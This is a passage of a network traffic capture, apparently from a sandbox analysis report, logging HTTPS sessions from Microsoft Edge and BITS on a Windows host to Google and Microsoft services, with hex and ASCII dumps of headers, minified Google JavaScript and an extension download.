2c 32 d0 Data Ascii: nh"\|GUr+!>RS@iV( oh$yG?tSIYn'hPK*pkfD$3yCA"67`%L'=MRqT=_)[u50G(nF\|V1lvgf&3]1g>Lc(s.u,2
2024-09-06 07:58:21 UTC	1390	IN	Data Raw: 1a 0c 27 c9 15 33 8e 4d 6d 30 cb db c6 1d 95 4b 44 47 2a fe 65 6d 62 82 56 4a e1 cb 97 55 fc 6d 2d fc d8 a1 69 e9 bd ea 7b 41 b9 d4 6c 30 29 3a d9 54 cc 2c 05 5e a2 02 b3 c5 bb 08 19 d8 62 b9 d7 a5 62 06 3c 34 40 2e 25 3c 2e c3 97 e2 9d d1 3b c2 71 73 13 d5 e3 35 1f 0d 77 bd 52 9b 9d 01 9b 76 ce d3 0a 52 52 c7 6b 5d b2 e6 95 0a ae bf 14 a3 21 ab aa 31 20 bd b4 d7 42 bf e6 ac e0 5e 40 6f ac 03 3a 6a 01 54 03 d6 36 21 06 2c ba 37 91 a3 0c 4f d2 f8 12 13 46 bb 84 e9 6e dd 4f 81 45 78 78 68 42 e3 13 1f ac 1d 5f 60 04 f8 9a c2 4f 39 8e dc 8c 8d 17 91 02 eb a3 e5 59 ed 20 d2 12 4f e2 a7 7e 66 86 b7 89 8d 5e 42 dd ad 6d cf 2f c2 ed a0 58 e6 a4 e8 94 cb 4f a1 44 3b d4 2c b4 50 44 ce 14 d0 d2 b6 82 1a 45 be 6a b8 a8 f3 70 b4 81 60 59 46 50 39 3d 99 b2 b8 fb 19 23 Data Ascii: '3Mm0KDG*embVJUm-i{Al0):T,^bb<4@.%<.;qs5wRvRRk]!1 B^@o:jT6!,7OFnOExxhB_`O9Y O~f^Bm/XOD;,PDEjp`YFP9=#
2024-09-06 07:58:21 UTC	1390	IN	Data Raw: 5e 4e 7f fd fa f3 8f 27 8f ff d8 06 aa 7b 8f 52 b0 a4 78 a6 f8 ce 72 c4 5f 39 36 74 23 3d a2 5e 64 ed 29 3c 87 d5 63 57 ef 41 05 40 38 0f e8 2f d0 e8 ee 60 78 31 a8 e0 aa 56 f0 9d a3 17 ab 1f c9 83 ee a5 c0 0c d4 43 84 42 20 54 19 07 77 89 e3 f9 04 05 67 92 9e a7 b0 83 ae 1c df b9 60 e3 01 68 2e f0 49 a9 c5 b0 3d 74 1f 03 d9 07 37 09 19 27 70 29 60 8f d4 1e 13 eb a4 2d 83 17 0b 58 58 65 0b 2b 09 80 2e 29 5a 5a 1e 7b 0b 46 a0 a2 7f e9 a8 77 64 98 5b 0e e4 3a 8a 11 91 76 32 04 ed 6a 28 4f 01 04 c6 70 85 84 f6 e7 b3 20 6e 41 39 10 d0 00 a9 42 a0 f8 c0 6e f0 6c 6d 44 a1 12 09 6c f4 67 bf 3f ab ff f1 f8 f1 1c 10 16 b7 35 9a 93 9f 70 5f e2 ca bd 60 c7 46 0f d8 18 13 66 58 1b 01 f9 88 5d 2a e3 a5 e8 eb b3 27 1a 94 30 a2 67 4f 44 be 18 97 0f cf c7 58 11 76 5a 6f Data Ascii: ^N'{Rxr_96t#=^d)<cWA@8/`x1VCB Twg`h.I=t7'p)`-XXe+.)ZZ{Fwd[:v2j(Op nA9BnlmDlg?5p_`FfX]*'0gODXvZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.7	49763	142.250.64.78	443	2332	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-06 07:58:21 UTC	1080	OUT	GET /accounts/CheckConnection?pmpo=https%3A%2F%2Faccounts.google.com&v=1736717058&timestamp=1725616698784 HTTP/1.1 Host: accounts.youtube.com Connection: keep-alive sec-ch-ua: "Not;A=Brand";v="8", "Chromium";v="117", "Google Chrome";v="117" sec-ch-ua-mobile: ?0 sec-ch-ua-full-version: "117.0.5938.132" sec-ch-ua-arch: "x86" sec-ch-ua-platform: "Windows" sec-ch-ua-platform-version: "10.0.0" sec-ch-ua-model: "" sec-ch-ua-bitness: "64" sec-ch-ua-wow64: ?0 sec-ch-ua-full-version-list: "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132", "Google Chrome";v="117.0.5938.132" Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: navigate Sec-Fetch-Dest: iframe Referer: https://accounts.google.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
2024-09-06 07:58:21 UTC	1971	IN	HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 X-Frame-Options: ALLOW-FROM https://accounts.google.com Content-Security-Policy: frame-ancestors https://accounts.google.com Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/AccountsDomainCookiesCheckConnectionHttp/cspreport Content-Security-Policy: script-src 'report-sample' 'nonce-YQO5IkG0qgASLciErZZ4lg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/AccountsDomainCookiesCheckConnectionHttp/cspreport;worker-src 'self' Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/AccountsDomainCookiesCheckConnectionHttp/cspreport/allowlist Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Fri, 06 Sep 2024 07:58:21 GMT Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Cross-Origin-Resource-Policy: cross-origin Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Cross-Origin-Opener-Policy: same-origin reporting-endpoints: default="/_/AccountsDomainCookiesCheckConnectionHttp/web-reports?context=eJzjstDikmJw1ZBikPj6kkkDiJ3SZ7AGAXHSv_OsRUC8JOIi66HEi6yXuy-xXgdi1Z5LrKZALMTDMffNq21sAhsebD3NpKSXlF8Yn5mSmleSWVKZkp-bmJmXnJ-fnZlaXJxaVJZaFG9kYGRiYGlgqGdgEV9gAAA0ey7Z" Server: ESF X-XSS-Protection: 0 X-Content-Type-Options: nosniff Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Accept-Ranges: none Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked
2024-09-06 07:58:21 UTC	1971	IN	Data Raw: 37 36 30 39 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 20 6e 6f 6e 63 65 3d 22 59 51 4f 35 49 6b 47 30 71 67 41 53 4c 63 69 45 72 5a 5a 34 6c 67 22 3e 22 75 73 65 20 73 74 72 69 63 74 22 3b 74 68 69 73 2e 64 65 66 61 75 6c 74 5f 41 63 63 6f 75 6e 74 73 44 6f 6d 61 69 6e 63 6f 6f 6b 69 65 73 43 68 65 63 6b 63 6f 6e 6e 65 63 74 69 6f 6e 4a 73 3d 74 68 69 73 2e 64 65 66 61 75 6c 74 5f 41 63 63 6f 75 6e 74 73 44 6f 6d 61 69 6e 63 6f 6f 6b 69 65 73 43 68 65 63 6b 63 6f 6e 6e 65 63 74 69 6f 6e 4a 73 7c 7c 7b 7d 3b 28 66 75 6e 63 74 69 6f 6e 28 5f 29 7b 76 61 72 20 77 69 6e 64 6f 77 3d 74 68 69 73 3b 0a 74 72 79 7b 0a 5f 2e 5f 46 5f 74 6f 67 67 6c 65 73 5f 69 6e 69 74 69 61 6c 69 7a 65 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 28 74 79 70 65 6f Data Ascii: 7609<html><head><script nonce="YQO5IkG0qgASLciErZZ4lg">"use strict";this.default_AccountsDomaincookiesCheckconnectionJs=this.default_AccountsDomaincookiesCheckconnectionJs\|\|{};(function(_){var window=this;try{_._F_toggles_initialize=function(a){(typeo
2024-09-06 07:58:21 UTC	1971	IN	Data Raw: 69 64 65 6e 74 5c 2f 28 5c 64 2e 5c 64 29 2f 2e 65 78 65 63 28 62 29 2c 0a 63 5b 31 5d 3d 3d 22 37 2e 30 22 29 69 66 28 62 26 26 62 5b 31 5d 29 73 77 69 74 63 68 28 62 5b 31 5d 29 7b 63 61 73 65 20 22 34 2e 30 22 3a 61 3d 22 38 2e 30 22 3b 62 72 65 61 6b 3b 63 61 73 65 20 22 35 2e 30 22 3a 61 3d 22 39 2e 30 22 3b 62 72 65 61 6b 3b 63 61 73 65 20 22 36 2e 30 22 3a 61 3d 22 31 30 2e 30 22 3b 62 72 65 61 6b 3b 63 61 73 65 20 22 37 2e 30 22 3a 61 3d 22 31 31 2e 30 22 7d 65 6c 73 65 20 61 3d 22 37 2e 30 22 3b 65 6c 73 65 20 61 3d 63 5b 31 5d 3b 62 3d 61 7d 65 6c 73 65 20 62 3d 22 22 3b 72 65 74 75 72 6e 20 62 7d 76 61 72 20 64 3d 52 65 67 45 78 70 28 22 28 5b 41 2d 5a 5d 5b 5c 5c 77 20 5d 2b 29 2f 28 5b 5e 5c 5c 73 5d 2b 29 5c 5c 73 2a 28 3f 3a 5c 5c 28 28 2e Data Ascii: ident\/(\d.\d)/.exec(b),c[1]=="7.0")if(b&&b[1])switch(b[1]){case "4.0":a="8.0";break;case "5.0":a="9.0";break;case "6.0":a="10.0";break;case "7.0":a="11.0"}else a="7.0";else a=c[1];b=a}else b="";return b}var d=RegExp("([A-Z][\\w ]+)/([^\\s]+)\\s*(?:\\((.
2024-09-06 07:58:21 UTC	1971	IN	Data Raw: 6f 6e 28 61 2c 62 2c 63 29 7b 61 3d 3d 6e 75 6c 6c 26 26 28 61 3d 79 61 29 3b 79 61 3d 76 6f 69 64 20 30 3b 69 66 28 61 3d 3d 6e 75 6c 6c 29 7b 76 61 72 20 64 3d 39 36 3b 63 3f 28 61 3d 5b 63 5d 2c 64 7c 3d 35 31 32 29 3a 61 3d 5b 5d 3b 62 26 26 28 64 3d 64 26 2d 31 36 37 36 30 38 33 33 7c 0a 28 62 26 31 30 32 33 29 3c 3c 31 34 29 7d 65 6c 73 65 7b 69 66 28 21 41 72 72 61 79 2e 69 73 41 72 72 61 79 28 61 29 29 74 68 72 6f 77 20 45 72 72 6f 72 28 22 6e 22 29 3b 64 3d 7a 28 61 29 3b 69 66 28 64 26 32 30 34 38 29 74 68 72 6f 77 20 45 72 72 6f 72 28 22 6f 22 29 3b 69 66 28 64 26 36 34 29 72 65 74 75 72 6e 20 61 3b 64 7c 3d 36 34 3b 69 66 28 63 26 26 28 64 7c 3d 35 31 32 2c 63 21 3d 3d 61 5b 30 5d 29 29 74 68 72 6f 77 20 45 72 72 6f 72 28 22 70 22 29 3b 61 3a Data Ascii: on(a,b,c){a==null&&(a=ya);ya=void 0;if(a==null){var d=96;c?(a=[c],d\|=512):a=[];b&&(d=d&-16760833\|(b&1023)<<14)}else{if(!Array.isArray(a))throw Error("n");d=z(a);if(d&2048)throw Error("o");if(d&64)return a;d\|=64;if(c&&(d\|=512,c!==a[0]))throw Error("p");a:
2024-09-06 07:58:21 UTC	1971	IN	Data Raw: 6e 63 74 69 6f 6e 28 61 29 7b 61 3d 43 3f 61 2e 4a 3a 4b 61 28 61 2e 4a 2c 4e 61 2c 76 6f 69 64 20 30 2c 76 6f 69 64 20 30 2c 21 31 29 3b 76 61 72 20 62 3d 21 43 2c 63 3d 61 2e 6c 65 6e 67 74 68 3b 69 66 28 63 29 7b 76 61 72 20 64 3d 61 5b 63 2d 31 5d 2c 65 3d 77 61 28 64 29 3b 65 3f 63 2d 2d 3a 64 3d 76 6f 69 64 20 30 3b 76 61 72 20 66 3d 61 3b 69 66 28 65 29 7b 62 3a 7b 76 61 72 20 68 3d 64 3b 76 61 72 20 67 3d 7b 7d 3b 65 3d 21 31 3b 69 66 28 68 29 66 6f 72 28 76 61 72 20 6b 20 69 6e 20 68 29 69 66 28 69 73 4e 61 4e 28 2b 6b 29 29 67 5b 6b 5d 3d 0a 68 5b 6b 5d 3b 65 6c 73 65 7b 76 61 72 20 6c 3d 68 5b 6b 5d 3b 41 72 72 61 79 2e 69 73 41 72 72 61 79 28 6c 29 26 26 28 41 28 6c 29 7c 7c 76 61 28 6c 29 26 26 6c 2e 73 69 7a 65 3d 3d 3d 30 29 26 26 28 6c 3d Data Ascii: nction(a){a=C?a.J:Ka(a.J,Na,void 0,void 0,!1);var b=!C,c=a.length;if(c){var d=a[c-1],e=wa(d);e?c--:d=void 0;var f=a;if(e){b:{var h=d;var g={};e=!1;if(h)for(var k in h)if(isNaN(+k))g[k]=h[k];else{var l=h[k];Array.isArray(l)&&(A(l)\|\|va(l)&&l.size===0)&&(l=
2024-09-06 07:58:21 UTC	1971	IN	Data Raw: 65 6f 66 20 64 3d 3d 3d 22 66 75 6e 63 74 69 6f 6e 22 26 26 74 79 70 65 6f 66 20 64 2e 70 72 6f 74 6f 74 79 70 65 5b 61 5d 21 3d 22 66 75 6e 63 74 69 6f 6e 22 26 26 44 28 64 2e 70 72 6f 74 6f 74 79 70 65 2c 61 2c 7b 63 6f 6e 66 69 67 75 72 61 62 6c 65 3a 21 30 2c 77 72 69 74 61 62 6c 65 3a 21 30 2c 76 61 6c 75 65 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 54 61 28 51 61 28 74 68 69 73 29 29 7d 7d 29 7d 72 65 74 75 72 6e 20 61 7d 29 3b 0a 76 61 72 20 54 61 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 61 3d 7b 6e 65 78 74 3a 61 7d 3b 61 5b 53 79 6d 62 6f 6c 2e 69 74 65 72 61 74 6f 72 5d 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 74 68 69 73 7d 3b 72 65 74 75 72 6e 20 61 7d 2c 46 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 76 61 72 20 62 3d Data Ascii: eof d==="function"&&typeof d.prototype[a]!="function"&&D(d.prototype,a,{configurable:!0,writable:!0,value:function(){return Ta(Qa(this))}})}return a});var Ta=function(a){a={next:a};a[Symbol.iterator]=function(){return this};return a},F=function(a){var b=
2024-09-06 07:58:21 UTC	1971	IN	Data Raw: 28 22 69 22 29 3b 64 28 6b 29 3b 69 66 28 21 47 28 6b 2c 66 29 29 74 68 72 6f 77 20 45 72 72 6f 72 28 22 6a 60 22 2b 6b 29 3b 6b 5b 66 5d 5b 74 68 69 73 2e 67 5d 3d 6c 3b 72 65 74 75 72 6e 20 74 68 69 73 7d 3b 67 2e 70 72 6f 74 6f 74 79 70 65 2e 67 65 74 3d 66 75 6e 63 74 69 6f 6e 28 6b 29 7b 72 65 74 75 72 6e 20 63 28 6b 29 26 26 47 28 6b 2c 66 29 3f 6b 5b 66 5d 5b 74 68 69 73 2e 67 5d 3a 76 6f 69 64 20 30 7d 3b 67 2e 70 72 6f 74 6f 74 79 70 65 2e 68 61 73 3d 66 75 6e 63 74 69 6f 6e 28 6b 29 7b 72 65 74 75 72 6e 20 63 28 6b 29 26 26 47 28 6b 2c 66 29 26 26 47 28 6b 5b 66 5d 2c 74 68 69 73 2e 67 29 7d 3b 67 2e 70 72 6f 74 6f 74 79 70 65 2e 64 65 6c 65 74 65 3d 66 75 6e 63 74 69 6f 6e 28 6b 29 7b 72 65 74 75 72 6e 20 63 28 6b 29 26 26 0a 47 28 6b 2c 66 29 Data Ascii: ("i");d(k);if(!G(k,f))throw Error("j`"+k);k[f][this.g]=l;return this};g.prototype.get=function(k){return c(k)&&G(k,f)?k[f][this.g]:void 0};g.prototype.has=function(k){return c(k)&&G(k,f)&&G(k[f],this.g)};g.prototype.delete=function(k){return c(k)&&G(k,f)
2024-09-06 07:58:21 UTC	1971	IN	Data Raw: 3d 22 66 75 6e 63 74 69 6f 6e 22 3f 62 2e 68 61 73 28 6b 29 3f 6c 3d 62 2e 67 65 74 28 6b 29 3a 28 6c 3d 22 22 2b 20 2b 2b 68 2c 62 2e 73 65 74 28 6b 2c 6c 29 29 3a 6c 3d 22 70 5f 22 2b 6b 3b 76 61 72 20 6d 3d 67 5b 30 5d 5b 6c 5d 3b 69 66 28 6d 26 26 47 28 67 5b 30 5d 2c 6c 29 29 66 6f 72 28 67 3d 30 3b 67 3c 6d 2e 6c 65 6e 67 74 68 3b 67 2b 2b 29 7b 76 61 72 20 71 3d 6d 5b 67 5d 3b 69 66 28 6b 21 3d 3d 6b 26 26 71 2e 6b 65 79 21 3d 3d 71 2e 6b 65 79 7c 7c 6b 3d 3d 3d 71 2e 6b 65 79 29 72 65 74 75 72 6e 7b 69 64 3a 6c 2c 6c 69 73 74 3a 6d 2c 69 6e 64 65 78 3a 67 2c 6c 3a 71 7d 7d 72 65 74 75 72 6e 7b 69 64 3a 6c 2c 6c 69 73 74 3a 6d 2c 69 6e 64 65 78 3a 2d 31 2c 6c 3a 76 6f 69 64 20 30 7d 7d 2c 65 3d 66 75 6e 63 74 69 6f 6e 28 67 2c 6b 29 7b 76 61 72 20 Data Ascii: ="function"?b.has(k)?l=b.get(k):(l=""+ ++h,b.set(k,l)):l="p_"+k;var m=g[0][l];if(m&&G(g[0],l))for(g=0;g<m.length;g++){var q=m[g];if(k!==k&&q.key!==q.key\|\|k===q.key)return{id:l,list:m,index:g,l:q}}return{id:l,list:m,index:-1,l:void 0}},e=function(g,k){var
2024-09-06 07:58:21 UTC	1971	IN	Data Raw: 7b 69 66 28 21 61 29 74 68 72 6f 77 20 45 72 72 6f 72 28 29 3b 69 66 28 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3e 32 29 7b 76 61 72 20 64 3d 41 72 72 61 79 2e 70 72 6f 74 6f 74 79 70 65 2e 73 6c 69 63 65 2e 63 61 6c 6c 28 61 72 67 75 6d 65 6e 74 73 2c 32 29 3b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3d 41 72 72 61 79 2e 70 72 6f 74 6f 74 79 70 65 2e 73 6c 69 63 65 2e 63 61 6c 6c 28 61 72 67 75 6d 65 6e 74 73 29 3b 41 72 72 61 79 2e 70 72 6f 74 6f 74 79 70 65 2e 75 6e 73 68 69 66 74 2e 61 70 70 6c 79 28 65 2c 64 29 3b 72 65 74 75 72 6e 20 61 2e 61 70 70 6c 79 28 62 2c 65 29 7d 7d 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 61 2e 61 70 70 6c 79 28 62 2c 0a 61 72 67 75 6d 65 6e 74 73 29 7d Data Ascii: {if(!a)throw Error();if(arguments.length>2){var d=Array.prototype.slice.call(arguments,2);return function(){var e=Array.prototype.slice.call(arguments);Array.prototype.unshift.apply(e,d);return a.apply(b,e)}}return function(){return a.apply(b,arguments)}
2024-09-06 07:58:21 UTC	1971	IN	Data Raw: 6c 69 6e 65 7c 7c 22 4e 6f 74 20 61 76 61 69 6c 61 62 6c 65 22 7d 63 61 74 63 68 28 66 29 7b 64 3d 22 4e 6f 74 20 61 76 61 69 6c 61 62 6c 65 22 2c 63 3d 21 30 7d 74 72 79 7b 76 61 72 20 65 3d 61 2e 66 69 6c 65 4e 61 6d 65 7c 7c 0a 61 2e 66 69 6c 65 6e 61 6d 65 7c 7c 61 2e 73 6f 75 72 63 65 55 52 4c 7c 7c 72 2e 24 67 6f 6f 67 44 65 62 75 67 46 6e 61 6d 65 7c 7c 62 7d 63 61 74 63 68 28 66 29 7b 65 3d 22 4e 6f 74 20 61 76 61 69 6c 61 62 6c 65 22 2c 63 3d 21 30 7d 62 3d 6e 62 28 61 29 3b 72 65 74 75 72 6e 21 63 26 26 61 2e 6c 69 6e 65 4e 75 6d 62 65 72 26 26 61 2e 66 69 6c 65 4e 61 6d 65 26 26 61 2e 73 74 61 63 6b 26 26 61 2e 6d 65 73 73 61 67 65 26 26 61 2e 6e 61 6d 65 3f 7b 6d 65 73 73 61 67 65 3a 61 2e 6d 65 73 73 61 67 65 2c 6e 61 6d 65 3a 61 2e 6e 61 6d Data Ascii: line\|\|"Not available"}catch(f){d="Not available",c=!0}try{var e=a.fileName\|\|a.filename\|\|a.sourceURL\|\|r.$googDebugFname\|\|b}catch(f){e="Not available",c=!0}b=nb(a);return!c&&a.lineNumber&&a.fileName&&a.stack&&a.message&&a.name?{message:a.message,name:a.nam
2024-09-06 07:58:21 UTC	1971	IN	Data Raw: 72 20 74 62 3d 52 65 67 45 78 70 28 22 5e 28 3f 3a 28 5b 5e 3a 2f 3f 23 2e 5d 2b 29 3a 29 3f 28 3f 3a 2f 2f 28 3f 3a 28 5b 5e 5c 5c 5c 5c 2f 3f 23 5d 2a 29 40 29 3f 28 5b 5e 5c 5c 5c 5c 2f 3f 23 5d 2a 3f 29 28 3f 3a 3a 28 5b 30 2d 39 5d 2b 29 29 3f 28 3f 3d 5b 5c 5c 5c 5c 2f 3f 23 5d 7c 24 29 29 3f 28 5b 5e 3f 23 5d 2b 29 3f 28 3f 3a 5c 5c 3f 28 5b 5e 23 5d 2a 29 29 3f 28 3f 3a 23 28 5b 5c 5c 73 5c 5c 53 5d 2a 29 29 3f 24 22 29 2c 75 62 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 69 66 28 21 62 29 72 65 74 75 72 6e 20 61 3b 76 61 72 20 63 3d 61 2e 69 6e 64 65 78 4f 66 28 22 23 22 29 3b 63 3c 30 26 26 28 63 3d 61 2e 6c 65 6e 67 74 68 29 3b 76 61 72 20 64 3d 61 2e 69 6e 64 65 78 4f 66 28 22 3f 22 29 3b 69 66 28 64 3c 30 7c 7c 64 3e 63 29 7b 64 3d 63 3b 76 Data Ascii: r tb=RegExp("^(?:([^:/?#.]+):)?(?://(?:([^\\\\/?#])@)?([^\\\\/?#]?)(?::([0-9]+))?(?=[\\\\/?#]\|$))?([^?#]+)?(?:\\?([^#]))?(?:#([\\s\\S]))?$"),ub=function(a,b){if(!b)return a;var c=a.indexOf("#");c<0&&(c=a.length);var d=a.indexOf("?");if(d<0\|\|d>c){d=c;v

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.7	49765	142.250.81.238	443	2332	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-06 07:58:22 UTC	561	OUT	OPTIONS /log?format=json&hasfast=true&authuser=0 HTTP/1.1 Host: play.google.com Connection: keep-alive Accept: / Access-Control-Request-Method: POST Access-Control-Request-Headers: x-goog-authuser Origin: https://accounts.google.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Sec-Fetch-Mode: cors Sec-Fetch-Site: same-site Sec-Fetch-Dest: empty Referer: https://accounts.google.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
2024-09-06 07:58:22 UTC	520	IN	HTTP/1.1 200 OK Access-Control-Allow-Origin: https://accounts.google.com Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Max-Age: 86400 Access-Control-Allow-Credentials: true Access-Control-Allow-Headers: X-Playlog-Web,authorization,origin,x-goog-authuser Content-Type: text/plain; charset=UTF-8 Date: Fri, 06 Sep 2024 07:58:22 GMT Server: Playlog Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.7	49766	142.250.81.238	443	2332	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-06 07:58:22 UTC	561	OUT	OPTIONS /log?format=json&hasfast=true&authuser=0 HTTP/1.1 Host: play.google.com Connection: keep-alive Accept: / Access-Control-Request-Method: POST Access-Control-Request-Headers: x-goog-authuser Origin: https://accounts.google.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Sec-Fetch-Mode: cors Sec-Fetch-Site: same-site Sec-Fetch-Dest: empty Referer: https://accounts.google.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
2024-09-06 07:58:22 UTC	520	IN	HTTP/1.1 200 OK Access-Control-Allow-Origin: https://accounts.google.com Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Max-Age: 86400 Access-Control-Allow-Credentials: true Access-Control-Allow-Headers: X-Playlog-Web,authorization,origin,x-goog-authuser Content-Type: text/plain; charset=UTF-8 Date: Fri, 06 Sep 2024 07:58:22 GMT Server: Playlog Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.7	49764	184.28.90.27	443

Timestamp	Bytes transferred	Direction	Data
2024-09-06 07:58:22 UTC	161	OUT	HEAD /fs/windows/config.json HTTP/1.1 Connection: Keep-Alive Accept: / Accept-Encoding: identity User-Agent: Microsoft BITS/7.8 Host: fs.microsoft.com
2024-09-06 07:58:22 UTC	466	IN	HTTP/1.1 200 OK Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json Content-Type: application/octet-stream ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7" Last-Modified: Tue, 16 May 2017 22:58:00 GMT Server: ECAcc (lpl/EF67) X-CID: 11 X-Ms-ApiVersion: Distribute 1.2 X-Ms-Region: prod-weu-z1 Cache-Control: public, max-age=31638 Date: Fri, 06 Sep 2024 07:58:22 GMT Connection: close X-CID: 2

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.7	49767	152.195.19.97	443	2332	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-06 07:58:22 UTC	616	OUT	GET /filestreamingservice/files/bdc392b9-6b81-4aaa-b3ee-2fffd9562edb?P1=1726214297&P2=404&P3=2&P4=dblHULbu6FFsuywLRQ7E2QnAHBWrnn2Jr3u8urVQarlI4JUVNJfv5ru0BKmsDa%2fQqwS%2fmyh7q6Zf1kVNhreKpg%3d%3d HTTP/1.1 Host: msedgeextensions.sf.tlu.dl.delivery.mp.microsoft.com Connection: keep-alive MS-CV: XarAPaSK/7t03lqXbosN/3 Sec-Fetch-Site: none Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47 Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
2024-09-06 07:58:22 UTC	632	IN	HTTP/1.1 200 OK Accept-Ranges: bytes Age: 5536033 Cache-Control: public, max-age=17280000 Content-Type: application/x-chrome-extension Date: Fri, 06 Sep 2024 07:58:22 GMT Etag: "Gv3jDkaZdFLRHkoq2781zOehQE8=" Last-Modified: Wed, 24 Jan 2024 00:25:37 GMT MS-CorrelationId: b4b4aabf-4d02-4629-96b1-a382405b6a31 MS-CV: 642I+iNy0Qp5KFcIV/sUKh.0 MS-RequestId: 5245ac9e-0afd-43ce-8780-5c7d0bedf1d4 Server: ECAcc (nyd/D11E) X-AspNet-Version: 4.0.30319 X-AspNetMvc-Version: 5.3 X-Cache: HIT X-CCC: US X-CID: 11 X-Powered-By: ASP.NET X-Powered-By: ARR/3.0 X-Powered-By: ASP.NET Content-Length: 11185 Connection: close
2024-09-06 07:58:22 UTC	11185	IN	Data Raw: 43 72 32 34 03 00 00 00 1d 05 00 00 12 ac 04 0a a6 02 30 82 01 22 30 0d 06 09 2a 86 48 86 f7 0d 01 01 01 05 00 03 82 01 0f 00 30 82 01 0a 02 82 01 01 00 bb 4e a9 d8 c8 e8 cb ac 89 0d 45 23 09 ef 07 9e ab ed 9a 39 65 ef 75 ea 71 bc a5 c4 56 59 59 ef 8c 08 40 04 2b ed 43 d0 dc 6b a7 4f 88 b9 62 4b d3 60 94 de 36 ee 47 92 ab 25 8a 1e cc 0d fa 33 5a 12 19 8e 65 20 5f fd 36 15 d6 13 1e 46 ae 8b 31 70 18 f1 a8 4b 1d 5a ff de 0e 83 8e 11 b2 2f 20 ed 33 88 cb fb 4f 54 94 9e 60 00 d3 bc 30 ab c0 d7 59 8b b0 96 46 54 fc f0 34 33 1c 74 68 d6 79 f9 0c 8c 7d 8a 91 98 ca 70 c6 4c 0f 1b c8 32 53 b9 26 69 cc 60 09 8d 6f ec f9 a6 66 8d 6f 48 81 0e 05 8a f1 97 4e b8 c3 94 3a b3 f7 69 6a 54 89 33 da 9e 46 7b d1 30 bb 2c cc 66 3f 27 66 e3 43 51 74 3b 62 5f 22 50 63 08 e5 20 Data Ascii: Cr240"0*H0NE#9euqVYY@+CkObK`6G%3Ze _6F1pKZ/ 